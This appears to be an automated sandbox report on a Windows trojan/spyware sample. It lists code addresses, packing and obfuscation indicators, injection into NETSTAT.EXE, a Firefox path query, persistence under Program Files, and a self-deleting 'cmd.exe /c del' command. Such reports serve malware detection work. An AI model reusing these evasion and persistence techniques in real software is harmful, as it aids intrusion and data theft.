Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C89410 0_2_00C89410 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C8C810 0_2_00C8C810 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C88020 0_2_00C88020 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C83838 0_2_00C83838 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C83830 0_2_00C83830 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C85834 0_2_00C85834 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C885CC 0_2_00C885CC Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C885D0 0_2_00C885D0 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C84998 0_2_00C84998 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C84995 0_2_00C84995 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C801BD 0_2_00C801BD Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C84D58 0_2_00C84D58 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C82AD1 0_2_00C82AD1 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C8F240 0_2_00C8F240 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C89211 0_2_00C89211 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C8022E 0_2_00C8022E Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C88BC0 0_2_00C88BC0 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C80BD8 0_2_00C80BD8 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C847B8 0_2_00C847B8 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C84BB8 0_2_00C84BB8 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C847B3 0_2_00C847B3 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C84BB3 0_2_00C84BB3 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C88B6C 0_2_00C88B6C Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_0041B0DB 2_2_0041B0DB Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_004078EB 2_2_004078EB Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_004078F0 2_2_004078F0 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_0041AB5A 2_2_0041AB5A Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_00419D31 2_2_00419D31 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_0041A742 2_2_0041A742 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0349FB40 5_2_0349FB40 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A63C2 5_2_034A63C2 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0347EBE0 5_2_0347EBE0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A4B96 5_2_034A4B96 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A4A5B 5_2_034A4A5B Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0354E214 5_2_0354E214 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03530A02 5_2_03530A02 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A523D 5_2_034A523D Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_035422DD 5_2_035422DD Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03541A99 5_2_03541A99 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034942B0 5_2_034942B0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A594B 5_2_034A594B Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A7110 5_2_034A7110 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_035419E2 5_2_035419E2 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A6180 5_2_034A6180 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0354D9BE 5_2_0354D9BE Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A1070 5_2_034A1070 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0353D016 5_2_0353D016 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034AE020 5_2_034AE020 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A0021 5_2_034A0021 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A48CB 5_2_034A48CB Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_035428E8 5_2_035428E8 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0348A080 5_2_0348A080 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_035218B6 5_2_035218B6 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03541746 5_2_03541746 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03541FCE 5_2_03541FCE Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03532782 5_2_03532782 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03495790 5_2_03495790 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03497640 5_2_03497640 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A4E61 5_2_034A4E61 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0353CE66 5_2_0353CE66 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A5E70 5_2_034A5E70 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A6611 5_2_034A6611 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_035426F8 5_2_035426F8 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03533E96 5_2_03533E96 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03470D40 5_2_03470D40 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03531D1B 5_2_03531D1B Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03542519 5_2_03542519 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0351C53F 5_2_0351C53F Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03491530 5_2_03491530 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0353D5D2 5_2_0353D5D2 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0352FDDB 5_2_0352FDDB Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03521DE3 5_2_03521DE3 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0353E581 5_2_0353E581 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034A547E 5_2_034A547E Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0348740C 5_2_0348740C Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03491410 5_2_03491410 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0352F42B 5_2_0352F42B Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_035344EF 5_2_035344EF Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03533490 5_2_03533490 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03541C9F 5_2_03541C9F Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032BAB5A 5_2_032BAB5A Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032A78EB 5_2_032A78EB Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032A78F0 5_2_032A78F0 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032BB0DB 5_2_032BB0DB
 Found potential string decryption / allocating functions Show sources
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0347B0E0 appears 168 times Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 034CDDE8 appears 34 times
 PE file contains strange resources Show sources
 Source: druS9vVaUK.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST Source: axh0nv7nt03do.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info Show sources
 Source: druS9vVaUK.exe Binary or memory string: OriginalFilename vs druS9vVaUK.exe Source: druS9vVaUK.exe, 00000000.00000002.444726602.0000000000C90000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamemscorwks.dllT vs druS9vVaUK.exe Source: druS9vVaUK.exe, 00000000.00000002.443094538.0000000000518000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameKnCXSjRjkQbpf.exe0 vs druS9vVaUK.exe Source: druS9vVaUK.exe, 00000000.00000002.453041651.0000000008880000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs druS9vVaUK.exe Source: druS9vVaUK.exe, 00000000.00000002.446398805.0000000002B00000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRuntimeCore.dll8 vs druS9vVaUK.exe Source: druS9vVaUK.exe, 00000002.00000002.500225053.00000000004F8000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameKnCXSjRjkQbpf.exe0 vs druS9vVaUK.exe Source: druS9vVaUK.exe, 00000002.00000002.503364248.000000000119F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs druS9vVaUK.exe Source: druS9vVaUK.exe, 00000002.00000002.500676997.00000000005F0000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs druS9vVaUK.exe Source: druS9vVaUK.exe Binary or memory string: OriginalFilenameKnCXSjRjkQbpf.exe0 vs druS9vVaUK.exe
 Searches the installation path of Mozilla Firefox Show sources
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory Jump to behavior
 Yara signature match Show sources
 PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3) Show sources
 Source: druS9vVaUK.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ Source: axh0nv7nt03do.exe.3.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/7@3/2
 Contains functionality to adjust token privileges (e.g. debug / backup) Show sources
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00BCA70E AdjustTokenPrivileges, 0_2_00BCA70E Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00BCA6D7 AdjustTokenPrivileges, 0_2_00BCA6D7
 Creates files inside the user directory Show sources
 Creates mutexes Show sources
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Mutant created: \Sessions\1\BaseNamedObjects\VdLINVBOKOiFSfVNXuAoBmCBmda Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3604:120:WilError_01
 Creates temporary files Show sources
 PE file has an executable .text section and no other executable section Show sources
 Source: druS9vVaUK.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this applications are using the .NET runtime (Probably coded in C#) Show sources
 Reads the hosts file Show sources
 Sample is known by Antivirus Show sources
 Source: druS9vVaUK.exe Virustotal: Detection: 33% Source: druS9vVaUK.exe ReversingLabs: Detection: 35%
 Spawns processes Show sources
 Source: unknown Process created: C:\Users\user\Desktop\druS9vVaUK.exe 'C:\Users\user\Desktop\druS9vVaUK.exe' Source: unknown Process created: C:\Users\user\Desktop\druS9vVaUK.exe {path} Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\druS9vVaUK.exe' Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: unknown Process created: C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe 'C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe' Source: C:\Users\user\Desktop\druS9vVaUK.exe Process created: C:\Users\user\Desktop\druS9vVaUK.exe {path} Jump to behavior Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe 'C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe' Jump to behavior Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\druS9vVaUK.exe' Jump to behavior
 Uses an in-process (OLE) Automation server Show sources
 Writes ini files Show sources
 Found graphical window changes (likely an installer) Show sources
 Source: Window Recorder Window detected: More than 3 window changes detected
 Uses Microsoft Silverlight Show sources
 Checks if Microsoft Office is installed Show sources
 PE file contains a COM descriptor data directory Show sources
 Source: druS9vVaUK.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
 Uses new MSVCR Dlls Show sources
 Contains modern PE file flags such as dynamic base (ASLR) or NX Show sources
 Source: druS9vVaUK.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
 Binary contains paths to debug symbols Show sources
 Source: Binary string: netstat.pdbGCTL source: druS9vVaUK.exe, 00000002.00000002.500676997.00000000005F0000.00000040.00000001.sdmp Source: Binary string: netstat.pdb source: druS9vVaUK.exe, 00000002.00000002.500676997.00000000005F0000.00000040.00000001.sdmp Source: Binary string: wntdll.pdbUGP source: druS9vVaUK.exe, 00000002.00000002.502552428.000000000100F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.853545081.000000000356F000.00000040.00000001.sdmp Source: Binary string: wntdll.pdb source: druS9vVaUK.exe, 00000002.00000002.502552428.000000000100F000.00000040.00000001.sdmp, NETSTAT.EXE Source: Binary string: mscorrc.pdb source: druS9vVaUK.exe, 00000000.00000002.453041651.0000000008880000.00000002.00000001.sdmp

### Data Obfuscation:

 Detected unpacking (changes PE section rights) Show sources
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Unpacked PE file: 0.2.druS9vVaUK.exe.4a0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
 Detected unpacking (overwrites its own PE header) Show sources
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Unpacked PE file: 0.2.druS9vVaUK.exe.4a0000.0.unpack
 Uses code obfuscation techniques (call, push, ret) Show sources
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_004DD405 push es; retf 0_2_004DD41F Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00BC2EED push esi; retf 0_2_00BC2EFA Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C60A35 push cs; iretd 0_2_00C60A3E Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C879E9 push esp; retf 0_2_00C87A02 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C887D9 push edi; iretd 0_2_00C887DA Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C873B4 push dword ptr [ecx+35B307F2h]; ret 0_2_00C873C9 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_00414058 pushad ; retf 2_2_00414059 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_00419A35 push eax; ret 2_2_00419A88 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_00419AEC push eax; ret 2_2_00419AF2 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_00419A82 push eax; ret 2_2_00419A88 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_00419A8B push eax; ret 2_2_00419AF2 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_0041AEEA push eax; ret 2_2_0041AEF1 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 2_2_004BD405 push es; retf 2_2_004BD41F Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_034CDE2D push ecx; ret 5_2_034CDE40 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032B9A35 push eax; ret 5_2_032B9A88 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032B9A8B push eax; ret 5_2_032B9AF2 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032B9A82 push eax; ret 5_2_032B9A88 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032B9AEC push eax; ret 5_2_032B9AF2 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032BAEEA push eax; ret 5_2_032BAEF1 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032BA486 pushad ; ret 5_2_032BA487
 Binary may include packed or encrypted code Show sources
 Source: initial sample Static PE infor